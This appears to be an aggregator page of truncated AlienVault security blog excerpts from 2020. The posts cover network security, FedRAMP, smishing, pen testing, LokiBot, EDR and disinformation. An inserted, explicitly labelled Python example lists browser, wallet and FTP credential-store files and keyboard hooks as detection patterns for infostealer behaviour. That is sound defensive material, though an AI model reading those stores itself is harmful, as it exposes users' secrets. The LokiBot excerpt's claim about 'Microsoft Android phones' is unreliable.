AlienVault.webp 2020-11-04 06:01:00 What is network security? Network security technologies explained (direct link) This blog was written by a third party author. The modern-day organization is under constant pressure to remain operational and profitable. Both of these pressures are put to the test daily by cybercriminals, who attempt to infiltrate, compromise, navigate, and ultimately act in a threatening manner that can have negative repercussions for productivity, ability to transact, customer privacy, brand reputation and bottom-line revenue. So, it’s necessary that organizations look to have proper network security in place to address the looming threat of cyberattacks, in an effort to maintain and protect access to, and the confidentiality of, your organization’s network and data. What is network security? Network security is a combination of people, process, policy, and technology used in a layered approach to create a network environment that allows for organizational productivity while simultaneously minimizing the ability for misuse by both external and internal threat actors. How is network security implemented? The people, process, and policy previously mentioned are a key part of the implementation of network security. They work together to take the security goals and create various types of security controls that are used to help establish how network security technologies will be implemented. The three most common types of network security controls are: Physical controls – These controls are used to prevent someone from physically gaining access to any of your organization’s network components. Your data center or server room likely has a keycard system to limit access. That’s a great example of a physical control. Security guards, video surveillance, picture IDs, and biometrics are other types of physical controls.
Data and access controls – These controls are the process and policy that define how employees can and should act when working with sensitive data, applications, and systems. Password requirements, mobile device usage, and incident response are just a few examples of administrative controls. Technical controls – Acting as a safeguard or countermeasure when interacting with critical parts of your network environment, these controls are typically implemented via network security technologies. The remainder of this article will focus on these technologies. Primary network security technologies A successful layered approach to network security requires that a number of technologies be put in place, each attempting to address the problem of malicious attacks from a different perspective. Some of the more common network security technologies include: Secure remote access – Access is the one thing every cybercriminal must have to successfully attack your organization. Access controls limit which users and devices are able to access specific internal or cloud-based resources. Modern implementations of access controls include zero trust network access (which facilitates access to internal and cloud-based resources without logically placing the user or their device on the corporate network), and secure remote access (a mix of technologies that can address endpoint security, authentication, secure remote connections, and elevation of privileges). Firewall – Firewalls sit at the logical perimeter of your organization’s network acting as a network security guard, inspecting inbound and outbound traffic and determining in real time whether to allow or deny it. Virtual Private Network (VPN) – VPNs encrypt Threat ★★★
AlienVault.webp 2020-11-02 12:00:00 SecTor 2020, Canada's biggest cybersecurity event: Day one (direct link) This blog was written by an independent guest blogger. I live in Toronto, so I always try my best to get to SecTor, Canada’s most important cybersecurity event, every October. Most years, SecTor has taken place in the Metro Toronto Convention Centre. But because of the unusual circumstances affecting the world in 2020, this year the event took place online exclusively. SecTor organizers hope that conditions improve by October 2021 so they can resume hosting the event in person. I admit I do miss the parties with delicious catering, and seeing people in our industry offline. But the talks this year have lived up to the excellent standards set by talks in previous years. This year, the main event took place on Wednesday, October 21st, and Thursday, October 22nd. There was so much to cover, even though it was impossible for me to attend all of the talks. First, I’ll start with the talks I attended on day one. Interestingly enough, they all have to do with threat detection and analysis. Enjoy! Threat Hunting Intelligently The first talk I attended was titled “Threat Hunting Intelligently.” It was presented by Ryan Cobb, Senior Information Security Researcher at Secureworks. Ryan Cobb's presentation excerpt Here’s the description of the talk, from SecTor’s web app: “Although times are unprecedented, for threat actors, it is business as usual. Even as times change, good threat intelligence will always be a bedrock of cybersecurity. Join Senior Security Research Consultant and Secureworks’ Threat Hunting lead Ryan Cobb, as he shares what’s on the threat horizon and how the Secureworks team is there to keep customers safe through the intersection of technology, tools, and passionate professionals who provide the ultimate advantage over the adversary.
Ryan will present how to combine the insights from threat modeling and intelligence to hunt purposefully and effectively without being limited by what third-party intelligence and strategies can provide for your organization.” Proper threat hunting procedures can identify indicators of compromise (IOCs) efficiently and produce intelligence that can help organizations mitigate a threat before it becomes a huge problem. Improper threat hunting wastes time, money, and effort, and misses data that could be leveraged to improve your organization’s defenses. So I paid close attention to what Cobb had to say. Here is an excerpt from his talk: “(Threat) modelling is going in and out of vogue over the years has a rich history, especially in Academia. It's a collaborative process where we enumerate threats and prioritize mitigations for them. It's basically a way of looking at your business the technologies that you've chosen and what we know about the threat after from a certain perspective, so we can look at a threat model from the perspective of the after what are the steps. They need to complete to accomplish their goals. What are the systems we are trying to protect and think about ways those assets to be to be attacked. The outcomes are many threat modeling exercise really should be a prioritized list of hypothetical scenarios and we want to organize them by which are the most plausible to actually occur. And the steps or other mediations? Hunting is the natural complement to threat modelling, hunting is determining whether some modeled threat actually occurred and went undetected, and hunting is largely focused on collecting and analyzing evidence that supports this hypothesis. So there's a significant overlap between what we do a threat hunting. The ultimate goal of for hunting is not simply finding the threat in the process of investigating the modeled threat. We are gauging the overal Malware Hack Threat Guideline
AlienVault.webp 2020-10-30 18:33:00 What is FedRAMP? Compliance and certification explained (direct link) This blog was written by a third party author. The Federal Risk and Authorization Management Program (FedRAMP) is a compliance program established by the US government that sets a baseline for cloud products and services regarding their approach to authorization, security assessment, and continuous monitoring. The program’s governing bodies include the Office of Management and Budget (OMB), US Department of Homeland Security (DHS), National Institute of Standards and Technology (NIST), US General Services Administration (GSA), US Department of Defense (DoD), and the Federal Chief Information Officers (CIO) Council. Any cloud service provider that wishes to offer products and services to the US government must establish FedRAMP compliance. Applying the NIST Special Publication 800 series as a baseline, FedRAMP requires cloud service providers to undergo an independent security assessment conducted by a third-party assessment organization (3PAO) to ensure authorizations comply with the Federal Information Security Management Act (FISMA). Note: The foundations of FedRAMP involve a significant number of acronyms, and as much as we tried to keep them to a minimum, they’re an essential part of the story.
FedRAMP was established to: Ensure that cloud systems used by government agencies have adequate safeguards in place Eliminate duplicated effort and reduce risk management costs Enable cost-effective and rapid government procurement of cloud services The goals for FedRAMP (according to FedRAMP.gov) are: Advancing the adoption of secure cloud solutions through reuse of assessments and authorizations Improving confidence in the security of cloud solutions and security assessments Achieving consistency of security authorizations with a set of agreed-upon standards for cloud product approval, in or outside of the program Ensuring consistency in the application of existing security practices Increasing automation and near real-time data for continuous monitoring Requirements for FedRAMP certification One of the most critical factors for successful government adoption of cloud computing is verifying that essential security controls are implemented on any cloud solution that stores, processes, or transmits government data. With FedRAMP, cloud systems must also meet the security levels and needs for protecting government data as verified by a 3PAO audit. The FedRAMP requirements apply to cloud service providers (CSP) and cloud service offerings (CSO). Depending on the application, the two acronyms (CSPs and CSOs) are used interchangeably. Other important FedRAMP acronyms include the authority to operate (ATO) and the FedRAMP Program Management Office (PMO). Reviewing the mandates for CSPs CSPs must prove that they meet FedRAMP compliance requirements before a federal agency can use them. The authorization mechanism is called the FedRAMP Authority to Operate (ATO). How the cloud service provider is authorized can be a significant decision for any CSP planning to offer products and services to federal agencies. There are two methods for obtaining a FedRAMP Authorization to Operate (ATO): directly from a government agency or from the Joint Authorization Board (JAB).
The latter authorization is known as a FedRAMP Provisional Authorization to Operate (P-ATO). Achieving a P-ATO is a more stringent process that is only available after a CSP has achieved several individual Agency ATOs. It requires assessment and approval by the Joint Authorization Board (JAB), comprised of the Department of Homeland Security (DHS), Department of Defense (DoD) and the General Services Administration (GSA). CSPs must achieve the following high-level requirements for FedRAMP certification, authorization, and compliance by the Guideline
AlienVault.webp 2020-10-30 05:01:00 What is Smishing? SMS phishing explained (direct link) This blog was written by a third party author. What is SMS phishing? SMS phishing, or “Smishing,” is a mobile phishing attack that targets victims via the SMS messaging channel rather than through email. A natural evolution of the phishing phenomenon, smishing attacks attempt to dupe mobile users with phony text messages containing links to legitimate-looking, but fraudulent, sites. These smishing sites try to steal credentials, propagate mobile malware, or perpetrate fraud. Though smishing has crept into users' text messaging streams for over a decade now, the technique has long flown under the radar with relatively small global attack volumes over the years. However, that's changing as cybercriminals seek to profit from today's mobility and remote work trends. Approximately 81% of organizations say their users faced at least some level of smishing attacks in 2019. Right before COVID-19 hit, smishing volume was already on the uptick. Between the last quarter of 2019 and the first quarter of 2020, mobile phishing attacks—including smishing—rose by 37%. As the lockdown era spurs on a wave of remote work and increased reliance on mobile devices, smishing numbers continue to climb. One study reported a 29% growth in smishing between March and July 2020. "On a small screen and with a limited ability to vet links and attachments before clicking on them, consumers and business users are exposed to more phishing risks than ever before," says IDC's Phil Hochmuth. "In a mobile-first world, with remote work becoming the norm, proactive defense against these attacks is critical.” Common types of Smishing attacks The allure of smishing to the cybercriminal community has obviously grown stronger due to the greater prevalence of text messaging in mobile users' lives in recent years.
However, the bad guys are arguably even more drawn to smishing due to the differences in how users interact with SMS messaging compared to email. The sense of urgency is higher for text messages, and their open rates are considerably higher than for email. According to MobileMarketer.com, while email recipients only open about 20% of their messages, SMS recipients open 98% of their texts. Consequently, big brands are increasingly using text messages rather than email for things like marketing messages, shipping verification, and account notifications. Added to the mix is the preference for SMS as a channel for multi-factor authentication, meaning that many mobile users have been habituated to interact with text messages in some way or other during the login process of many of their cloud, retail, and banking accounts. All of this creates a prime breeding ground for smishing attackers to perpetrate their fraud, as users are highly engaged with and very likely to act quickly on most text messages that come their way. The bad guys take advantage of that sense of immediacy and tailor the attacks to mimic the various ways that brands regularly interact with customers via SMS. Listing common SMS phishing tactics Some very common types of smishing messages include: Fake shipping notifications Tech support impersonation Phony bank account balance warnings Counterfeit customer service notices Prize notifications for made-up rewards Bogus Covid-19 contact tracing messages These messages are used to trick the user into either downloading a fraudulent app or opening a link to password-stealing or fraud-inducing mobile sites. Further aiding the Threat
AlienVault.webp 2020-10-29 05:01:00 Vulnerability scanning vs. Penetration testing: comparing the two security offerings (direct link) This blog was written by a third party author. It’s no secret: the number of security vulnerabilities organizations must contend with is overwhelming. According to a 2019 Risk Based Security report, there were 22,316 newly discovered vulnerabilities last year. One Patch Tuesday disclosed a record number of 327 vulnerabilities in a single day. Just keeping up is becoming a monumental task. But knowing where and how your organization may be vulnerable is critical to maintaining a healthy security posture. As vulnerabilities add up and the threat landscape widens, two crucial strategies for understanding where you are and where you need to be security-wise are vulnerability assessments and penetration tests. At the very core, almost all organizations should be doing both. If you’re not, you may be exposing yourself to great risks. It’s easy to understand why some may confuse the two strategies (they are complementary, after all), but there are key differences between vulnerability assessments and penetration testing. The differences between vulnerability scanning and penetration testing Vulnerability scanning is typically conducted with software leveraging automated processes and looks for known vulnerabilities in various systems. Once complete, a report on risk exposure is generated. Penetration testing (or pen tests), on the other hand, leverages manual processes and is typically carried out by a cybersecurity expert or experts who try to find holes and exploits within your system architecture. Penetration testing is sometimes referred to as ethical hacking, in that you are enlisting the help of a third party to “hack” into your systems to see if they are easily penetrable.
Vulnerability testing determines the extent to which critical systems and sensitive information are vulnerable to compromise or attack due to outstanding patches and/or common security misconfigurations. Penetration testing takes this a step further to exploit the vulnerabilities identified in order to gain access to critical systems, sensitive information, or a specified trophy. While automated vulnerability scanning can help you identify security flaws that need remediation, it can’t holistically help you evaluate the strength of your organization’s security controls against the complex strategies a human attacker might employ, such as chaining multiple vulnerabilities together as part of the overall kill chain. Here’s an analogy that underscores the difference between the two strategies. If your systems were a car and the threat landscape were rough roads and icy conditions, a vulnerability scan would represent the vehicle’s 10-point check — tires, suspension, engine, etc. A pen test would represent the equivalent of taking the car on a test drive down a rough road in bad weather to see how everything holds up. It's important to remember that a pen test isn't just capitalizing on vulnerabilities that a vulnerability scanner would discover. Pen tests dig deeper into those configurations and interactions between devices and systems (and where they are located) that can be exploited. There are many cases in which your environment “passes” a vulnerability scan without any identified issues but could still be insecure. You wouldn’t know this without a proper pen test. Why perform vulnerability scans or pen tests? New vulnerabilities are discovered and disclosed every day. While compliance mandates or basic security strategies may dictate that you need to patch at least monthly, vulnerability scans executed more frequently are recommended.
This way, organizations can benefit significantly by gaining an accurate representation of their security profile. Depending on the co Vulnerability Threat
AlienVault.webp 2020-10-28 11:00:00 LokiBot Malware: What it is and how to respond to it (direct link) This blog was written by an independent guest blogger. The Cybersecurity and Infrastructure Security Agency (CISA) of the U.S. Department of Homeland Security recently announced that activity in LokiBot, a form of aggressive malware, has increased dramatically over the last two months. The activity increase was discovered by an automated intrusion detection system referred to as EINSTEIN, which the Department of Homeland Security uses for collecting and analyzing security information across numerous government agencies. Following the detection, CISA issued a security advisory warning Federal agencies and private sector entities alike about the malware. Malware is essentially a piece of software or firmware that is intentionally placed into a system (or host) for malicious purposes (hence the term ‘malware’). It has long been a major problem, but it has only become worse since the coronavirus pandemic began, as hackers and cybercriminals have sought to take advantage of the chaos created by the situation. LokiBot is one such example. In this article, we will dive into what exactly LokiBot is and the threat it poses, the techniques that were used to deploy this malware, and then the steps you can take to remove it from an infected system. What is LokiBot? LokiBot was first released on underground forums for hackers to target Microsoft Android phones in early 2016. Since then, it has grown to become a much more widespread and dangerous threat than it originally was, as it has been widely distributed via torrent files and email spam (among other techniques) by low-to-mid level hackers targeting passwords. At this point, LokiBot is among the most prevalent forms of malware, and for 2020 has actually been the single most common form of malware used to attack command-and-control servers.
LokiBot can infect computers and mobile devices alike by searching for locally installed applications. The malware then searches the internal databases of those applications for credentials and attempts to extract them. LokiBot also comes with a keylogging feature that allows it to capture keystrokes in order to determine the passwords used for accounts that may not be stored in those internal databases. As a result of these capabilities, mobile applications, cryptocurrency wallets, emails, and browsers alike are all vulnerable to LokiBot. The good news is that LokiBot is far from invincible. For example, storing your data in the cloud is one of the best defensive measures you can take, because your data will be stored encrypted, decentralized, and ultimately harder to obtain. How big of a threat does LokiBot pose? Even though LokiBot has become much more prominent than it once was, the real question that needs to be asked is: even though it’s common, how big of a threat actually is it? One of the biggest concerns with LokiBot isn’t just the fact that it can target everything from emails to cryptocurrency wallets; it’s also that it can create a backdoor to allow a hacker to install additional malicious software and steal information. LokiBot also makes use of a very simple codebase that makes it easy for lower-level cybercriminals to use. If anything, it’s for this reason that it has become so widely used. Furthermore, LokiBot utilizes methods to make it seem like nothing is hap Spam Malware Threat
AlienVault.webp 2020-10-28 05:01:00 What is endpoint detection and response? EDR security explained (direct link) This blog was written by a third party author. The evolving endpoint attack surface As recent global health events have changed the world, the cybersecurity landscape has changed along with it. Almost all organizations — large or small — have seen their attack surface grow. For those unfamiliar with the term, an attack surface represents the sum total of all the ways in which a bad actor can exploit an endpoint or network to retrieve data. Every endpoint that connects to or communicates with the network is part of the network attack surface. It’s important to note that people are an essential element of an attack surface. Your employees represent a gateway to your network and critical data. The attack surface is not only a critical measure for large businesses but for small and mid-sized organizations as well. While many small businesses may believe they aren’t big enough to be hacked, the size of their attack surface — which is probably expanding — may be enough to expose them to serious risk. The endpoint attack surface has evolved further than experts predicted. Today’s attack surface for most organizations is broader and more complex than ever before due to a combination of factors, including the shift to a work from home (WFH) model, and more smartphones and IoT devices connecting to networks in unprecedented numbers. What is endpoint detection and response? Endpoint Detection and Response (EDR) is the process of monitoring and detecting, in real time, any suspicious activity or events occurring at the endpoint. The goal of EDR solutions is to give your company visibility into threats on a detailed timeline and provide real-time alerts in the event of an attack. EDR, at its core, should provide visibility — one of the most critical security capabilities.
As the attack surface widens, organizations are increasingly relying on endpoint detection and response (EDR) solutions for that next level of visibility and to alert on attacks that would not trigger firewall or IDS/IPS rules. A good analogy for EDR is the black box used on airplanes to record flight data. In this analogy, the airplane represents your endpoints and the black box represents the endpoint data recorded from them, such as running processes, installed programs and network logins (your threat surface). Just as black box data helps prevent similar crashes in the future, EDR data helps detect and prevent similar future cyberattacks. The benefits of EDR security With the right EDR solution, IT and security teams gain the visibility they need to reveal threats that would otherwise have gone unseen. When EDR is properly deployed in your organization, you can expect the following benefits: Unified security management - Having all of your business-critical devices, including mobile devices, fixed endpoints and server environments, visible through a "single pane of glass" makes managing and securing everything easier. Safeguard against key threat vectors - Especially in the current work from home (WFH) climate, mobile endpoints must be protected against key threat vectors both inside and outside the corporate network perimeter. Identify and close security gaps - Gaps in endpoint security are easily overlooked, especially as the number and complexity of data, apps and connections grow. With improved visibility of the endpoints on your perimeter, these gaps come to the forefront. Simplify endpoint management - A robust EDR solution brings many security tools and layers together so that data from each can be shared, protecting your organization from multiple angles. This simplified management allows you to focus on your business instead of using pr Threat
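The LokiBot behaviour described above (a dropped process enumerating the credential stores of several unrelated applications and then installing a keyboard hook) is exactly the kind of activity the "black box" endpoint telemetry just described is collected to catch. The following is an added example, not code from either blog post and not from AT&T, AlienVault or any EDR product: a toy correlation pass in Python over a constructed stream of process, file-read and keyboard-hook events. The event schema, the credential-store filenames, the mapping of which processes legitimately read which stores, the harvesting threshold and the sample telemetry are all assumptions made for this illustration.

```python
import os
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass
class Event:
    """One endpoint telemetry record (constructed schema, not a real EDR format)."""
    ts: int            # seconds since boot, constructed
    kind: str          # "process" | "file_read" | "keyboard_hook"
    pid: int
    ppid: int = 0      # only meaningful for "process" events
    image: str = ""    # executable path for "process" events
    target: str = ""   # file path or hook name for the other kinds


# Credential-store filenames an infostealer looks for, mapped to the category of
# application that owns them (illustrative subset; an assumption for this example).
CRED_STORE_HINTS = {
    "login data": "browser",       # Chromium-based browsers
    "logins.json": "browser",      # Firefox
    "wallet.dat": "wallet",        # Bitcoin Core style wallet
    "recentservers.xml": "ftp",    # FileZilla
}
# Processes that legitimately read each category of store (assumption).
LEGIT_READERS: Dict[str, Set[str]] = {
    "browser": {"chrome.exe", "msedge.exe", "firefox.exe"},
    "wallet": {"bitcoin-qt.exe"},
    "ftp": {"filezilla.exe"},
}
OFFICE_IMAGES = {"winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_IMAGES = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of Windows separators."""
    return os.path.basename(path.replace("\\", "/")).lower()


def store_category(path: str) -> Optional[str]:
    """Category of credential store the path points at, or None if it is not one."""
    name = basename(path)
    for hint, category in CRED_STORE_HINTS.items():
        if hint in name:
            return category
    return None


def detect(events: List[Event], harvest_threshold: int = 2) -> List[dict]:
    """Run four correlation rules over the telemetry and return the alerts raised."""
    procs: Dict[int, Event] = {}                          # pid -> process creation event
    stores_read: Dict[int, Set[str]] = defaultdict(set)   # pid -> store categories read
    alerts: List[dict] = []

    def raise_alert(rule: str, ev: Event, reason: str) -> None:
        alerts.append({"rule": rule, "pid": ev.pid, "ts": ev.ts, "reason": reason})

    def image_of(pid: int) -> str:
        return basename(procs[pid].image) if pid in procs else "<unknown>"

    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "process":
            procs[ev.pid] = ev
            parent = procs.get(ev.ppid)
            # Rule 1: an Office document spawning a script host is the classic
            # macro/phishing delivery chain for commodity stealers.
            if (parent and basename(parent.image) in OFFICE_IMAGES
                    and basename(ev.image) in SCRIPT_IMAGES):
                raise_alert("office_spawns_script", ev,
                            f"{basename(parent.image)} -> {basename(ev.image)}")
        elif ev.kind == "file_read":
            category = store_category(ev.target)
            if category is None:
                continue
            reader = image_of(ev.pid)
            if reader in LEGIT_READERS.get(category, set()):
                continue  # the owning application reading its own store is normal
            # Rule 2: any other process reading a credential store.
            raise_alert("foreign_cred_store_read", ev, f"{reader} read {ev.target}")
            stores_read[ev.pid].add(category)
            # Rule 3: the same process touching stores of several unrelated
            # applications, i.e. the enumerate-everything behaviour of a stealer.
            already = any(a["rule"] == "credential_harvesting" and a["pid"] == ev.pid
                          for a in alerts)
            if len(stores_read[ev.pid]) >= harvest_threshold and not already:
                raise_alert("credential_harvesting", ev,
                            f"{reader} harvested {sorted(stores_read[ev.pid])}")
        elif ev.kind == "keyboard_hook":
            # Rule 4: a global keyboard hook is how user-mode keyloggers capture input.
            raise_alert("keyboard_hook", ev, f"{image_of(ev.pid)} installed {ev.target}")
    return alerts


# Constructed telemetry: a benign browser session, then a document-borne dropper
# that harvests credentials and starts keylogging (all paths and pids are assumed).
SAMPLE_EVENTS = [
    Event(100, "process", pid=4, ppid=1, image=r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    Event(101, "file_read", pid=4, target=r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(200, "process", pid=10, ppid=1, image=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),
    Event(205, "process", pid=11, ppid=10, image=r"C:\Windows\System32\wscript.exe"),
    Event(206, "process", pid=12, ppid=11, image=r"C:\Users\alice\AppData\Roaming\updater.exe"),
    Event(210, "file_read", pid=12, target=r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(211, "file_read", pid=12, target=r"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\x1.default\logins.json"),
    Event(212, "file_read", pid=12, target=r"C:\Users\alice\AppData\Roaming\FileZilla\recentservers.xml"),
    Event(213, "keyboard_hook", pid=12, target="WH_KEYBOARD_LL"),
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['ts']:>4}] pid {a['pid']:<3} {a['rule']:<24} {a['reason']}")
```

Two design points worth noting. Rule 2 on its own is noisy (backup agents and sync clients also read these files), which is why Rule 3 only fires when one process has touched stores belonging to unrelated applications; that cross-application pattern is what distinguishes a stealer from a legitimate reader. And none of these rules need a signature for a particular malware family: they describe behaviour, which is what EDR telemetry gives you that a firewall or IDS rule does not.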
AlienVault.webp 2020-10-27 11:00:00 Duped, deluded, deceived: How disinformation defrauds you (lien direct) This blog was written by an independent guest blogger. The rise of social media has no doubt been one of the major revolutions of the 21st century. It has brought about a whole new way for people to connect and share information with others, regardless of their geographical locations. But alongside these more noble uses of social media there will always be abuse of these platforms, and one of the big ones is the spread of disinformation. Disinformation (Merriam-Webster), noun: false information deliberately and often covertly spread (as by the planting of rumors) in order to influence public opinion or obscure the truth. Cybercriminals also use this tactic as a way to spread fear, or to steer less wary members of the public down a route that furthers their own agendas or outright defrauds them. A classic example is the COVID-19 pandemic. In March, the Telco Security Alliance reported a 2000% increase in COVID-related IoCs. One notable tactic was cybercriminals impersonating the CDC to get users to take a test or download malicious executables. While these email fraud attempts on their own might not seem effective against a discerning recipient, combine them with the barrage of social media posts those people might see in a given day and you have what psychologists call the "illusory truth effect". This is the phenomenon whereby people come to believe statements they see repeated time and again more readily than statements they see only once. The more often a person sees a piece of information, the more likely they are to start believing that it is true.
So, when we look at the COVID-19 scenario, consider how much information gets repeated daily online and on social media about vaccines and so-called "cures". Now suppose a user has seen these pieces of disinformation repeatedly within their social networks, posted by people they trust, on top of the fear they may already be feeling about the situation: that user will be more vulnerable to attempts by cybercriminals to defraud them. This has huge impacts on the general public, as well as on organizations whose employees all have potentially exploitable email addresses and mobile devices. The topic will be explored in more depth during Security Serious Week: Action Against Disinformation, taking place 26th – 30th October 2020. You can also catch AT&T Cybersecurity's own Theresa Lanowitz on Thursday 29th October on the panel discussion Duped, Deluded, Deceived: How Disinformation Defrauds You. The virtual panel session will unpack how cybercriminals use disinformation to manipulate individuals and how we can protect employees from falling foul of these attempts. Register here: https://attendee.gotowebinar.com/register/2743836075601893646?source=Eskenzi+Website
Last update at: 2024-04-25 05:07:54